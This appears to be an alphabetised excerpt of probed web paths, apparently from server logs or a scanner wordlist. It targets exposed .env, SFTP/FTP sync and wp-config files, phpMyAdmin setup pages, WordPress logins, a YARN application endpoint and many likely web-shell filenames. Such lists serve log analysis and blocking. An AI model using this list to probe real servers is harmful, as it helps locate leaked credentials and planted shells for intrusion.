/.vscode/ftp-sync.json
/.vscode/settings.json
/.vscode/sftp.json
//vtigercrm/vtigerservice.php
/vtigercrm/vtigerservice.php
/w00tw00t.at.blackhats.romanian.anti-sec:)
/wanan.php
/wan.php
/wb.php
/wc.php
/wcp.php
/webadmin
/webadmin/scripts/setup.php
/webdav
/webdav/
/webdb/scripts/setup.php
/web/deployment-config.json
/web/.env
/web/.ftpconfig
/web/ftpsync.settings
/web/phpMyAdmin/index.php
/web/phpMyAdmin/scripts/setup.php
/web/.remote-sync.json
/web/scripts/setup.php
/web/sftp-config.json
/website/deployment-config.json
/website/.env
/website/.ftpconfig
/website/ftpsync.settings
/website/.remote-sync.json
/website/sftp-config.json
/website/.vscode/ftp-sync.json
/website/.vscode/settings.json
/website/.vscode/sftp.json
/webslee.php
/websql/scripts/setup.php
/web/.vscode/ftp-sync.json
/web/.vscode/settings.json
/web/.vscode/sftp.json
/weixiao.php
/.well-known/acme-challenge/lNxr-i04eHI9RYK5A0BahgHFfDIghiX4Jc98iCEZeqI
/.well-known/acme-challenge/zWb3h-sMfPDhRRBs8AvSMteV2MUTYswgZTxEz-PZbyQ
/.well-known/security.txt
/win1.php
/win.php
/wordpress/wp-login.php
/Wordpress/wp-login.php
/wp-admins.php
/wp-config.php
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en
/wpc.php
/wp/deployment-config.json
/wp/.env
/wp/.ftpconfig
/wp/ftpsync.settings
/w.php
//wp-login.php
/wp-login.php
/wp-login.php?action=register
/wpo.php
/wp/.remote-sync.json
/wp/sftp-config.json
/wp/.vscode/ftp-sync.json
/wp/.vscode/settings.json
/wp/.vscode/sftp.json
/wp/wp-login.php
/wshell.php
/ws/v1/cluster/apps/new-application
/wuwu11.php
www.baidu.com
www.baidu.com:443
/www/deployment-config.json
/www/.env
/www/.ftpconfig
/www/ftpsync.settings
www.google.com:443
/www.php
/www/phpMyAdmin/index.php
/www/.remote-sync.json
/www/sftp-config.json
/www/.vscode/ftp-sync.json
/www/.vscode/settings.json
/www/.vscode/sftp.json
/xampp/phpmyadmin
/xampp/phpmyadmin/index.php
/xampp/phpmyadmin/scripts/setup.php
/xiaodai.php
/xiaohei.php
/xiaomae.php
/xiaoma.php
/xiaomar.php
/xiaomo.php
/xiao.php
/xiaoyu.php
/x.php
/xp.php
/xshell.php
/xw1.php
/xw.php
/xx.php
/xxx.php
/xxxx.php
/xz.php
/y000000000000.cfg
/yao.php
/YaYWZ/
/yj.php
/yumo.php
/z.php
/zshmindex.php
/z/style.css
/zuoindex.php
/zuo.php
/zuoshou.php
/zuoshss.php
/zuos.php
/zuoss.php
/zxc0.php
/zxc1.php
/zxc2.php
/zzk.php
